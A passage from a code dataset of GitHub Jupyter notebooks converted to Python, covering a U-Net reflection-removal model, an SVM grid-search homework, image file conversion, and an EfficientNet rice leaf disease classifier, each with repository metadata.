= (2,2))(conv3_concat)\n conv4 = Conv2D(256, kernel_size = kernel_size, activation = 'relu', padding = 'same')(pool3)\n conv4_1 = Conv2D(256, kernel_size = kernel_size, activation = 'relu', padding = 'same')(conv4)\n conv4_concat = concatenate([conv4, conv4_1], axis = -1)#256\n\n pool4 = MaxPooling2D(pool_size = (2,2))(conv4_concat)\n conv5 = Conv2D(512, kernel_size = kernel_size, activation = 'relu', padding = 'same')(pool4)\n conv5 = Conv2D(512, kernel_size = kernel_size, 
activation = 'relu', padding = 'same')(conv5)\n\n up1 = Conv2DTranspose(filters = 256, kernel_size=(2,2), strides=(2,2), padding = 'same', activation = 'relu')(conv5)\n up1 = concatenate([ conv4_concat, up1 ] , axis = 3)\n conv6 = Conv2D(256, kernel_size = kernel_size, activation = 'relu', padding = 'same')(up1)\n conv6 = Conv2D(256, kernel_size = kernel_size, activation = 'relu', padding = 'same')(conv6)\n up7 = Conv2DTranspose(filters = 128, kernel_size=(2,2), strides=(2,2), padding = 'same', activation = 'relu')(conv6)\n up7 = concatenate([conv3, up7], axis = 3)\n conv7 = Conv2D(128, kernel_size = kernel_size, activation = 'relu', padding = 'same')(up7)\n conv7_1 = Conv2D(128, kernel_size = kernel_size, activation = 'relu', padding = 'same')(conv7)\n concat_1_up = concatenate([conv7, conv7_1], axis = 3)#128 concat\n\n up8 = Conv2DTranspose(filters = 64, kernel_size=(2,2), strides=(2,2), padding = 'same', activation = 'relu')(concat_1_up)\n up8 = concatenate([conv2_concat, up8], axis = 3)\n conv8 = Conv2D(64, kernel_size = kernel_size, activation = 'relu', padding = 'same')(up8)\n conv8_1 = Conv2D(64, kernel_size = kernel_size, activation = 'relu', padding = 'same')(conv8)\n concat_2_up = concatenate([conv8, conv8_1], axis = 3)#64 concat\n\n up9 = Conv2DTranspose(filters = 32, kernel_size=(2,2), strides=(2,2), padding = 'same', activation = 'relu')(concat_2_up)\n up9 = concatenate([conv1_concat, up9], axis = 3)\n conv9 = Conv2D(filters = 32, kernel_size = kernel_size, activation = 'relu', padding = 'same')(up9)\n output = Conv2D(filters = 3, kernel_size = kernel_size, activation='sigmoid', padding='same')(conv9)\n model = Model(input , output)\n return model\n\n def SSIM(self, x_true, x_pred):\n return tf.image.ssim(x_true, x_pred, max_val=1.0, filter_size=11,\n filter_sigma=1.5, k1=0.01, k2=0.03)\n def PSNR(self, original_image, reconstructed_image):\n return tf.image.psnr(original_image, reconstructed_image, max_val=1)\n\n def ssim_loss(self, y_true, y_pred):\n return 1.-tf.image.ssim(y_true, y_pred, max_val=1.0, filter_size=11,\n filter_sigma=1.5, k1=0.01, k2=0.03)+1./self.PSNR(y_true, y_pred)\n\n def make_compiled_model(self):\n model = self.__prepare_model()\n model.compile(loss=self.ssim_loss, optimizer=Adam(learning_rate=0.001), metrics=[self.SSIM, self.PSNR])\n return model\n\nmodel = My_Model_Arch().make_compiled_model()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"Mxl0UQz9GwIu\" outputId=\"c3e9d336-d5c1-4d05-ee8b-74be11c823f9\"\nif imageClear.shape == imageNoise.shape:\n print(imageClear.shape, imageNoise.shape)\n train_history = model.fit(\n imageNoise,\n imageClear,\n epochs=65,\n shuffle=True,\n batch_size = 32,\n validation_data=(imageNoise_valid, imageClear_valid)\n)\n\n# + id=\"GfRLQctyGz4s\"\ntf.keras.models.save_model( model, 'drive/MyDrive/model/tests/test_unet_skip_connects.h5' )\n\n# + id=\"H1TjJAGNG0pK\"\nimageClear = []\nimage_clear_path = '/content/drive/MyDrive/baza/test_base/true_image_test/'\nfor image in os.listdir(image_clear_path):\n imageClear.append(cv2.imread(os.path.join(image_clear_path, image)))\n\nimageClear = np.array(imageClear, dtype='object')\n\nimageClear = imageClear.astype('float32') / 255.\nprediction = model.predict(imageClear)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 529} id=\"JK-ez9ku00i6\" outputId=\"caba4666-236f-49a1-b1ed-80cb57347175\"\nidx = 9\ncv2_imshow(prediction[idx]* 255.)\ncv2_imshow(imageClear[idx]* 
255.)\n","repo_name":"mkalinowski11/Reflects-removal-project","sub_path":"models_implementation_notebooks/UNet++_type.ipynb","file_name":"UNet++_type.ipynb","file_ext":"py","file_size_in_byte":7948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"37892707256","text":"# + id=\"Z0yGksgOp91i\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.svm import SVC, SVR\nfrom sklearn.metrics import accuracy_score\n\n# + id=\"7ZYQFbA0qMZ-\"\n# Load data\nx_train = np.load(\"x_train.npy\")\ny_train = np.load(\"y_train.npy\")\nx_test = np.load(\"x_test.npy\")\ny_test = np.load(\"y_test.npy\")\n\n# + id=\"u0ewnfh6qOoM\"\n# 7000 data with 300 features\nprint(x_train.shape)\nprint(y_train.shape)\nprint(x_test.shape)\n\n# + id=\"ryZdU0fdqTkb\"\n# It's a binary classification problem \nprint(np.unique(y_train))\n\n\n# + [markdown] id=\"qy1aMJ7sqwwg\"\n# # Q1\n\n# + id=\"TI26_jRbqVX3\"\ndef cross_validation(x_train, y_train, k=5):\n \n # Do not modify the function name and always take 'x_train, y_train, k' as the inputs.\n\n # TODO HERE\n k_fold_data = []\n \n #shuffle\n np.random.seed(0)\n train_size = np.shape(x_train)[0]\n shuffle_index = np.arange(train_size)\n np.random.shuffle(shuffle_index)\n for i in range(k):\n ##Calculate boundary\n left_bound = np.int64(i*train_size/k)\n right_bound = np.int64((i+1)*train_size/k)\n #Split the training data\n x_train_fold = np.concatenate((x_train[shuffle_index[0:left_bound]],x_train[shuffle_index[right_bound:train_size]]), axis=0)\n y_train_fold = np.reshape(np.concatenate((y_train[shuffle_index[0:left_bound]],y_train[shuffle_index[right_bound:train_size]]), axis=0),(-1,1))\n train_fold = np.concatenate((x_train_fold, y_train_fold), axis=1)\n x_val_fold = x_train[shuffle_index[left_bound: right_bound]]\n y_val_fold = np.reshape(y_train[shuffle_index[left_bound: right_bound]],(-1,1))\n val_fold = np.concatenate((x_val_fold, y_val_fold), axis=1)\n #Pack the data\n kth_data=[]\n kth_data.append(train_fold)\n kth_data.append(val_fold)\n k_fold_data.append(kth_data)\n return k_fold_data\n\n\n# + id=\"7jTma6saqf3E\"\nkfold_data = cross_validation(x_train, y_train, k=10)\nassert len(kfold_data) == 10 # should contain 10 fold of data\nassert len(kfold_data[0]) == 2 # each element should contain train fold and validation fold\nassert kfold_data[0][1].shape[0] == 700 # The number of data in each validation fold should equal to training data divieded by K\n\n# + [markdown] id=\"IccJcpN_q0Z0\"\n# # K-Fold Example\n\n# + id=\"O_zT2TAzqjay\"\nfrom sklearn.model_selection import KFold\n\nX = np.arange(20)\n\nkf = KFold(n_splits=5, shuffle=True)\nkfold_data= []\nfor i, (train_index, val_index) in enumerate(kf.split(X)):\n print(\"Split: %s, Training index: %s, Validation index: %s\" % (i+1, train_index, val_index))\n kfold_data.append([train_index, val_index])\n\n# + id=\"lYCTmie5qnow\"\nassert len(kfold_data) == 5 # should contain 5 fold of data\nassert len(kfold_data[0]) == 2 # each element should contains index of training fold and validation fold\nassert kfold_data[0][1].shape[0] == 4 # The number of data in each validation fold should equal to training data divieded by K\n\n# + [markdown] id=\"Gh-DQiNiq5v0\"\n# ## Q2\n\n# + id=\"31V1fW7Qq6la\"\n# (Example) Using SVC from sklearn\n\nclf = SVC(C=1.0, gamma=0.01, kernel='rbf')\n\n# + id=\"VzBT0t6Yq_Dj\"\nbest_c, best_gamma = None, None\n\n# TODO HERE\n# k-Flod Cross Validation and Grid Search\n#def accuracy_score(y, 
y_pred):\n# return (y_pred == y).sum()/np.shape(y)[0]\n\ndef grid_search( x_train, y_train, c, gamma, k):\n best_c, best_gamma, best_acc = None, None, 0\n kfold_data = cross_validation(x_train, y_train, k)\n total_acc = np.zeros((len(c),len(gamma)))\n for i_th ,c_ in enumerate(c):\n #print(\"i_th: \", i_th)\n for j_th, gamma_ in enumerate(gamma):\n #print(\"j_th: \", j_th)\n k_fold_acc = np.zeros(k)\n for k_th , k_th_data in enumerate(kfold_data):\n k_train = k_th_data[0]\n k_val = k_th_data[1]\n clf = SVC(C=c_, gamma=gamma_, kernel='rbf')\n clf.fit(k_train[:,0:-1], np.reshape(k_train[:,-1],-1))\n y_pred = clf.predict(k_val[:,0:-1])\n k_fold_acc[k_th] = accuracy_score(np.reshape(k_val[:,-1],-1), y_pred)\n total_acc[i_th][j_th] = np.average(k_fold_acc)\n #print(\"total_acc[i_th][j_th]: \", total_acc[i_th][j_th])\n if total_acc[i_th][j_th] >= best_acc:\n best_c = c_\n best_gamma = gamma_\n best_acc = total_acc[i_th][j_th]\n return best_c, best_gamma , total_acc\n\nc = [0.01, 0.1, 1, 10, 100, 1000, 10000]\ngamma = [1e-4, 1e-3, 0.01, 0.1, 1, 10, 100, 1000]\n#c = [100, 1000]\n#gamma = [10, 100]\nk = 5\nbest_c, best_gamma , total_acc = grid_search(x_train, y_train, c, gamma, 5)\nbest_parameters=(best_c, best_gamma)\n#print(total_acc)\n\n# + id=\"mGTyHMFgrAXd\"\nprint(\"(best_c, best_gamma) is \", best_parameters)\n\n\n# + [markdown] id=\"KbPoOy0lrDPJ\"\n# # Q3\n\n# + id=\"ibuxQOEQrEgJ\"\n# Plot the grid search results of your SVM\n\n# TODO HERE\ndef show_grid_search(c, gamma, total_acc):\n threshold = (np.max(total_acc)+np.min(total_acc))/2\n color_range = (np.max(total_acc)-np.min(total_acc))/2\n plt.imshow(total_acc,interpolation='nearest',cmap=plt.cm.RdBu)\n plt.title(\"Hyperparameter Gridsearch\")\n plt.colorbar()\n \n tick_index_gamma = np.arange(len(gamma))\n tick_index_c = np.arange(len(c))\n \n plt.xticks(tick_index_gamma,gamma)\n plt.yticks(tick_index_c,c, rotation=90)\n for i in range(total_acc.shape[0]):\n for j in range(total_acc.shape[1]):\n plt.text(j,i,format(total_acc[i,j], '.2f'),horizontalalignment=\"center\",color=\"black\" if ((total_acc[i,j] > (threshold-color_range))&(total_acc[i,j] < (threshold+color_range))) else \"white\")\n plt.tight_layout()\n plt.xlabel(\"Gamma Parameter\")\n plt.ylabel(\"C Parameter\")\n plt.show()\n\nshow_grid_search(c, gamma, total_acc)\n\n# + [markdown] id=\"QVA-It-4rM9Q\"\n# ## Q4\n\n# + id=\"Zl963HdLrMKg\"\n# Do Not Modify Below\n\nbest_model = SVC(C=best_parameters[0], gamma=best_parameters[1], kernel='rbf')\nbest_model.fit(x_train, y_train)\n\ny_pred = best_model.predict(x_test)\n\nprint(\"Accuracy score: \", accuracy_score(y_pred, y_test))\n\n# If your accuracy here > 0.9 then you will get full credit (20 points).\n","repo_name":"ThreeMonth03/Pattern-Recognition-and-Machine-Learning","sub_path":"HW4/0810749_HW4.ipynb","file_name":"0810749_HW4.ipynb","file_ext":"py","file_size_in_byte":6112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"26355945381","text":"# +\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport csv\n\nX = [] # 배열 형태로 선언, X는 attribute\nY = [] # 배열 형태로 선언, Y는 label\n\n# +\n# dataset open\nf= open(\"X.csv\", 'r');\ncsvReader = csv.reader(f)\nfor row in csvReader:\n X.append(row) #csvReader 로 데이터를 2차원 배열형태로 받고 row에 한행씩 저장된다.\n\nf = open(\"Y.csv\",\"r\")\ncsvReader = csv.reader(f)\nfor row in csvReader:\n Y.append(row) # 마찬가지로 row 형태로 Y 배열에 한 row씩 저장\n \nf.close()\n# 
-\n\n\n","repo_name":"gunooknam/Deep_learning_Study","sub_path":".ipynb_checkpoints/Untitled-checkpoint.ipynb","file_name":"Untitled-checkpoint.ipynb","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"18557920591","text":"import pandas as pd\nimport gender_guesser.detector as gender\nd = gender.Detector(case_sensitive=False)\n\npath = \"movie_metadata.csv\"\n\nfile = pd.read_csv(path)\nfor row in file:\n print(row[6])\n\nprint(d.get_gender(u\"Jason\"))\n\n\n","repo_name":"haidysedky/AnalyticsProject-UCI","sub_path":".ipynb_checkpoints/gender-checkpoint.ipynb","file_name":"gender-checkpoint.ipynb","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"330601731","text":"import os \nimport cv2\n\n# # 更改檔名(tif直接改附檔名會編碼錯誤)\n\n# +\npath = './img_input/'\nsave_path = './img_output'\nori_type = '.tif'\ntarget_tpye = '.jpg'\n\nfiles = os.listdir(path)\nprint(files)\nn = 0\nfor i in files:\n oldname = path + files [n]\n newname = path +str(n+1)+ori_type\n os.rename(oldname, newname)\n # print(oldname)\n# print(newname)\n n = n+1\n# -\n\n# # 變更圖檔類型(tif -> jpg)\n\n# +\npath = './img_input/'\nsave_path = './img_output'\nori_type = '.tif'\ntarget_tpye = '.jpg'\n\ntif_list = os.listdir(path)\nprint(type(tif_list))\n\nn =0\nfor i in tif_list:\n oldname = path + tif_list [n]\n img = cv2.imread(oldname,-1)\n x = cv2.imwrite(os.path.join(save_path,i.split('.')[0]+target_tpye),img)\n # print(oldname)\n # print(img)\n n=n+1\n\n# -\n\n\n\n\n","repo_name":"ChengChen-Yang/project_evaluation-cell-viability","sub_path":"1_change&convert/change&convert.ipynb","file_name":"change&convert.ipynb","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"25652959606","text":"# + id=\"aymaXBbEISUD\"\nimport numpy as np\nimport pandas as pd\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nimport time\nimport matplotlib.pyplot as plt\nimport cv2\nimport seaborn as sns\nsns.set_style('darkgrid')\nimport shutil\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.layers import Dense, Activation,Dropout,Conv2D, MaxPooling2D,BatchNormalization\nfrom tensorflow.keras.optimizers import Adam, Adamax\nfrom tensorflow.keras.metrics import categorical_crossentropy\nfrom tensorflow.keras import regularizers\nfrom tensorflow.keras.models import Model\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"a0NCafiLIdhO\" outputId=\"f0cd6dee-c9df-4c3e-d1fb-fbc46444ae2a\"\nfrom google.colab import drive \ndrive.mount('/content/drive/')\n\n# + id=\"A2To7CxfRg3V\"\nimport cv2\nimport imghdr\nimport pathlib\nsdir='/content/drive/MyDrive/Processed'\nsdir = pathlib.Path(sdir)\n\n\n# + id=\"8XHWRH5gOP2-\"\ntrain_dir='/content/drive/MyDrive/Processed/train'\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 1000} id=\"qZV0fjbQIWWO\" outputId=\"f2c67c61-932d-4bb2-ad2d-e3fad93498b4\"\ncroplist=os.listdir(sdir)\nfilepaths = []\nlabels=[]\nfor crop in croplist:\n croppath=os.path.join(sdir,crop) \n classlist=os.listdir(croppath)\n for klass in classlist: \n 
classpath=os.path.join(croppath,klass)\n flist=os.listdir(classpath)\n for f in flist:\n fpath=os.path.join(classpath,f)\n filepaths.append(fpath)\n labels.append(klass)\nFseries=pd.Series(filepaths, name='filepaths')\nLseries=pd.Series(labels, name='labels') \ndf=pd.concat([Fseries, Lseries], axis=1)\ntrain_df, dummy_df=train_test_split(df, train_size=.8, shuffle=True, random_state=123, stratify=df['labels']) \nvalid_df, test_df=train_test_split(dummy_df, train_size=.5, shuffle=True, random_state=123, stratify=dummy_df['labels'])\nprint('train_df lenght: ', len(train_df))\n# get the number of classes and the images count for each class in train_df\nclasses=sorted(list(train_df['labels'].unique()))\nclass_count = len(classes)\nprint('The number of classes in the dataset is: ', class_count)\ngroups=train_df.groupby('labels')\ncountlist=[]\nclasslist=[]\nfor label in sorted(list(train_df['labels'].unique())):\n group=groups.get_group(label)\n countlist.append(len(group))\n classlist.append(label)\nCatseries=pd.Series(classlist, name='Category')\nCountseries=pd.Series(countlist, name='Image Count')\ncrop_df=pd.concat([Catseries, Countseries], axis=1)\nprint(crop_df.head(class_count))\nfig = plt.figure(figsize=(10,10))\nlabels=crop_df['Category']\nsizes=crop_df['Image Count']\nx=np.arange(len(labels))\nplt.xticks(np.arange(class_count)+.5, classes, rotation=90)\nplt.title('Image Sample distribution')\nplt.bar(x,sizes, tick_label=crop_df['Category'])\nplt.show()\n# get the classes with the minimum and maximum number of train images\nmax_value=np.max(countlist)\nmax_index=countlist.index(max_value)\nmax_class=classlist[max_index]\nmin_value=np.min(countlist)\nmin_index=countlist.index(min_value)\nmin_class=classlist[min_index]\nprint(max_class, ' has the most images= ',max_value, ' ', min_class, ' has the least images= ', min_value)\n# lets get the average height and width of a sample of the train images\nht=0\nwt=0\n# select 100 random samples of train_df\ntrain_df_sample=train_df.sample(n=100, random_state=123,axis=0)\nfor i in range (len(train_df_sample)):\n fpath=train_df_sample['filepaths'].iloc[i]\n img=plt.imread(fpath)\n shape=img.shape\n ht += shape[0]\n wt += shape[1]\nprint('average height= ', ht//100, ' average width= ', wt//100, 'aspect ratio= ', ht/wt)\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"Rb0JV2b6IWYu\" outputId=\"fe239af8-1208-4a23-ee0d-21d7db223876\"\ndef trim(df, max_samples, min_samples, column):\n df=df.copy()\n groups=df.groupby(column) \n trimmed_df = pd.DataFrame(columns = df.columns)\n groups=df.groupby(column)\n for label in df[column].unique(): \n group=groups.get_group(label)\n count=len(group) \n if count > max_samples:\n sampled_group=group.sample(n=max_samples, random_state=123,axis=0)\n trimmed_df=pd.concat([trimmed_df, sampled_group], axis=0)\n else:\n if count>=min_samples:\n sampled_group=group \n trimmed_df=pd.concat([trimmed_df, sampled_group], axis=0)\n print('after trimming, the maximum samples in any class is now ',max_samples, ' and the minimum samples in any class is ', min_samples)\n return trimmed_df\n\nmax_samples=490 # since each class has more than 200 images all classes will be trimmed to have 200 images per class\nmin_samples=400\ncolumn='labels'\ntrain_df= trim(train_df, max_samples, min_samples, column)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"RdxzRorXR8ae\" outputId=\"5d041c8d-258a-402a-e60a-e2da9581de99\"\n\nbatch_size=30 \ntrgen=ImageDataGenerator(horizontal_flip=True,rotation_range=20, 
width_shift_range=.2,\n height_shift_range=.2, zoom_range=.2 )\nt_and_v_gen=ImageDataGenerator()\nmsg='{0:70s} for train generator'.format(' ')\nprint(msg, '\\r', end='')\ntrain_gen=trgen.flow_from_dataframe(train_df, x_col='filepaths', y_col='labels', target_size=img_size,\n class_mode='categorical', color_mode='rgb', shuffle=True, batch_size=batch_size)\nmsg='{0:70s} for valid generator'.format(' ')\nprint(msg, '\\r', end='')\nvalid_gen=t_and_v_gen.flow_from_dataframe(valid_df, x_col='filepaths', y_col='labels', target_size=img_size,\n class_mode='categorical', color_mode='rgb', shuffle=False, batch_size=batch_size)\n\n\nlength=len(test_df)\ntest_batch_size=sorted([int(length/n) for n in range(1,length+1) if length % n ==0 and length/n<=80],reverse=True)[0] \ntest_steps=int(length/test_batch_size)\nmsg='{0:70s} for test generator'.format(' ')\nprint(msg, '\\r', end='')\n\n\ntest_gen=t_and_v_gen.flow_from_dataframe(test_df, x_col='filepaths', y_col='labels', target_size=img_size,\n class_mode='categorical', color_mode='rgb', shuffle=False, batch_size=test_batch_size)\n\n\nclasses=list(train_gen.class_indices.keys())\nclass_indices=list(train_gen.class_indices.values())\nclass_count=len(classes)\nlabels=test_gen.labels\nprint ( 'test batch size: ' ,test_batch_size, ' test steps: ', test_steps, ' number of classes : ', class_count)\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 883} id=\"0xbp9GdSR8kK\" outputId=\"b04b803d-6335-45a1-ee78-ac9a360d19c0\"\ndef show_image_samples(gen ):\n t_dict=gen.class_indices\n classes=list(t_dict.keys()) \n images,labels=next(gen) \n plt.figure(figsize=(20, 20))\n length=len(labels)\n if length<25:\n r=length\n else:\n r=25\n for i in range(r): \n plt.subplot(5, 5, i + 1)\n image=images[i] /255 \n plt.imshow(image)\n index=np.argmax(labels[i])\n class_name=classes[index]\n plt.title(class_name, color='blue', fontsize=12)\n plt.axis('off')\n plt.show()\n \nshow_image_samples(train_gen )\n\n# + id=\"irikfK7ziQuM\"\nimg_shape=(img_size[0], img_size[1], 3)\nmodel_name='EfficientNetB3'\nbase_model=tf.keras.applications.efficientnet.EfficientNetB3(include_top=False, weights=\"imagenet\",input_shape=img_shape, pooling='max') \nbase_model.trainable=True\nx=base_model.output\nx=BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001 )(x)\nx = Dense(256, kernel_regularizer = regularizers.l2(l = 0.016),activity_regularizer=regularizers.l1(0.006),\n bias_regularizer=regularizers.l1(0.006) ,activation='relu')(x)\nx=Dropout(rate=.4, seed=123)(x) \noutput=Dense(class_count, activation='softmax')(x)\nmodel=Model(inputs=base_model.input, outputs=output)\nlr=.001 # start with this learning rate\nmodel.compile(Adamax(learning_rate=lr), loss='categorical_crossentropy', metrics=['accuracy']) \n\n# + id=\"EP3bOc28R8p8\"\n\n\n# + id=\"MoXJxYoCSUYz\"\nclass LR_ASK(keras.callbacks.Callback):\n def __init__ (self, model, epochs, ask_epoch): \n super(LR_ASK, self).__init__()\n self.model=model \n self.ask_epoch=ask_epoch\n self.epochs=epochs\n self.ask=True \n self.lowest_vloss=np.inf\n self.best_weights=self.model.get_weights() # set best weights to model's initial weights\n self.best_epoch=1\n \n \n def on_train_begin(self, logs=None): # this runs on the beginning of training\n if self.ask_epoch == 0: \n print('you set ask_epoch = 0, ask_epoch will be set to 1', flush=True)\n self.ask_epoch=1\n if self.ask_epoch >= self.epochs: \n print('ask_epoch >= epochs, will train for ', epochs, ' epochs', flush=True)\n self.ask=False \n if self.epochs == 1:\n 
self.ask=False# running only for 1 epoch so do not query user\n else:\n print('Training will proceed until epoch', ask_epoch,' then you will be asked to') \n print(' enter H to halt training or enter an integer for how many more epochs to run then be asked again') \n self.start_time= time.time() \n \n def on_train_end(self, logs=None): # runs at the end of training \n print('loading model with weights from epoch ', self.best_epoch)\n self.model.set_weights(self.best_weights) # set the weights of the model to the best weights\n tr_duration=time.time() - self.start_time \n hours = tr_duration // 3600\n minutes = (tr_duration - (hours * 3600)) // 60\n seconds = tr_duration - ((hours * 3600) + (minutes * 60))\n msg = f'training elapsed time was {str(hours)} hours, {minutes:4.1f} minutes, {seconds:4.2f} seconds)'\n print (msg, flush=True) \n \n def on_epoch_end(self, epoch, logs=None): # method runs on the end of each epoch\n v_loss=logs.get('val_loss') # get the validation loss for this epoch\n if v_loss< self.lowest_vloss:\n self.lowest_vloss=v_loss\n self.best_weights=self.model.get_weights() # set best weights to model's initial weights\n self.best_epoch=epoch + 1\n print ('\\n validation loss reduced, saving weights from epoch ', epoch + 1, ' as best weights')\n \n if self.ask: \n if epoch + 1 ==self.ask_epoch: \n print('\\n Enter H to end training or an integer for the number of additional epochs to run then ask again')\n ans=input()\n \n if ans == 'H' or ans =='h' or ans == '0': # quit training for these conditions\n print ('you entered ', ans, ' Training halted on epoch ', epoch+1, ' due to user input\\n', flush=True)\n self.model.stop_training = True # halt training\n else: # user wants to continue training\n self.ask_epoch += int(ans)\n if self.ask_epoch > self.epochs:\n print('\\nYou specified maximum epochs of as ', self.epochs, ' cannot train for ', self.ask_epoch, flush =True)\n else:\n print ('you entered ', ans, ' Training will continue to epoch ', self.ask_epoch, flush=True)\n lr=float(tf.keras.backend.get_value(self.model.optimizer.lr)) # get the current learning rate\n print('current LR is ', lr,' hit enter to keep this LR or enter a new LR')\n ans=input(' ')\n if ans =='':\n print ('keeping current LR')\n else:\n new_lr=float(ans)\n tf.keras.backend.set_value(self.model.optimizer.lr, new_lr) # set the learning rate in the optimizer\n print(' changing LR to ', ans)\n\n# + id=\"OMIeXSLxSUeJ\"\nepochs=40\nask_epoch=10\nask=LR_ASK(model, epochs, ask_epoch)\nrlronp=tf.keras.callbacks.ReduceLROnPlateau(monitor=\"val_loss\", factor=0.5, patience=2,verbose=1)\ncallbacks=[rlronp, ask]\ncallbacks=[ask]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"TsFnqasmS4cF\" outputId=\"36cc65bf-5874-4579-8805-7f1053028ce4\"\n\nhistory=model.fit(x=train_gen, epochs=epochs, verbose=1, callbacks=callbacks, validation_data=valid_gen,\n validation_steps=None, shuffle=False, initial_epoch=0)\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 885} id=\"urQSxWnITHA1\" outputId=\"7cb91571-1368-480e-90cb-85ee1ae2801d\"\ndef predictor(test_gen, test_steps):\n y_pred= []\n y_true=test_gen.labels\n classes=list(train_gen.class_indices.keys())\n class_count=len(classes)\n errors=0\n preds=model.predict(test_gen, steps=test_steps, verbose=1)\n tests=len(preds)\n for i, p in enumerate(preds):\n pred_index=np.argmax(p) \n true_index=test_gen.labels[i] # labels are integer values\n if pred_index != true_index: # a misclassification has occurred \n errors=errors + 1\n 
y_pred.append(pred_index)\n acc=( 1-errors/tests) * 100\n print(f'there were {errors} errors in {tests} tests for an accuracy of {acc:6.2f}')\n ypred=np.array(y_pred)\n ytrue=np.array(y_true)\n if class_count <=30:\n cm = confusion_matrix(ytrue, ypred )\n \n plt.figure(figsize=(12, 8))\n sns.heatmap(cm, annot=True, vmin=0, fmt='g', cmap='Blues', cbar=False) \n plt.xticks(np.arange(class_count)+.5, classes, rotation=90)\n plt.yticks(np.arange(class_count)+.5, classes, rotation=0)\n plt.xlabel(\"Predicted\")\n plt.ylabel(\"Actual\")\n plt.title(\"Confusion Matrix\")\n plt.show()\n clr = classification_report(y_true, y_pred, target_names=classes, digits= 4) # create classification report\n print(\"Classification Report:\\n----------------------\\n\", clr)\n return errors, tests\nerrors, tests=predictor(test_gen, test_steps)\n\n# + id=\"kDccIlCmo9Xq\"\nmodel.save_weights('segment_model_weights.h5')\n\n\n# + id=\"oxIvk1KVqm-C\"\nimport tensorflow as tf\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Dense, Dropout, BatchNormalization\nfrom tensorflow.keras.optimizers import Adamax\n\n\nimg_size = (224, 224)\nclass_count = 4\nimg_shape = (img_size[0], img_size[1], 3)\n\n\nbase_model = tf.keras.applications.efficientnet.EfficientNetB3(include_top=False, weights=\"imagenet\",input_shape=img_shape, pooling='max') \n\n# Make the base model trainable\nbase_model.trainable = True\n\nx = base_model.output\nx = BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001)(x)\nx = Dense(256, kernel_regularizer=regularizers.l2(l=0.016), activity_regularizer=regularizers.l1(0.006),\n bias_regularizer=regularizers.l1(0.006), activation='relu')(x)\nx = Dropout(rate=.4, seed=123)(x) \noutput = Dense(class_count, activation='softmax')(x)\n\n\nmodel = Model(inputs=base_model.input, outputs=output)\n\n\nmodel.load_weights('segment_model_weights.h5')\n\n\nlr = 0.001\nmodel.compile(Adamax(learning_rate=lr), loss='categorical_crossentropy', metrics=['accuracy'])\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"uKsKpR5iqnHJ\" outputId=\"41bbf1a2-5c07-4465-ba5d-0ad27088f609\"\n# Save the trained model in a binary format\ntf.saved_model.save(model, 'segment_trained_model')\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"5Y2899DNuwsB\" outputId=\"1a083e20-d06b-4213-86dd-0f1ce842b8d4\"\nimport tensorflow as tf\n\n# Convert the model to TFLite format\nconverter = tf.lite.TFLiteConverter.from_keras_model(model)\ntflite_model = converter.convert()\n\n# Save the TFLite model to disk\nwith open('segment_trained_model.tflite', 'wb') as f:\n f.write(tflite_model)\n\n\n# + id=\"0xcYWx6xDpbP\"\n\n","repo_name":"mham7/Rice-leaf-disease-detector","sub_path":"rice_disease_detector_model.ipynb","file_name":"rice_disease_detector_model.ipynb","file_ext":"py","file_size_in_byte":15901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"73644219921","text":"# + [markdown] id=\"view-in-github\" colab_type=\"text\"\n# \"Open\n\n# + [markdown] id=\"QNuYuEEwgoLo\"\n# ## Importing necessary libraries\n\n# + id=\"anm7ygLlfspu\"\n# Importing sqrt function from math module\nfrom math import sqrt\n\n\n# + [markdown] id=\"jJpOaYQJf0J6\"\n# ## Calculating Euclidean distance\n\n# + id=\"U7AMYD0HfzDl\"\n# calculate the Euclidean distance between two vectors\n# Formula - Euclidean Distance = sqrt(sum i to N (x1_i – x2_i)^2)\ndef euclidean_distance(row1, row2):\n distance = 0.0\n for i in range(len(row1)):\n distance += 
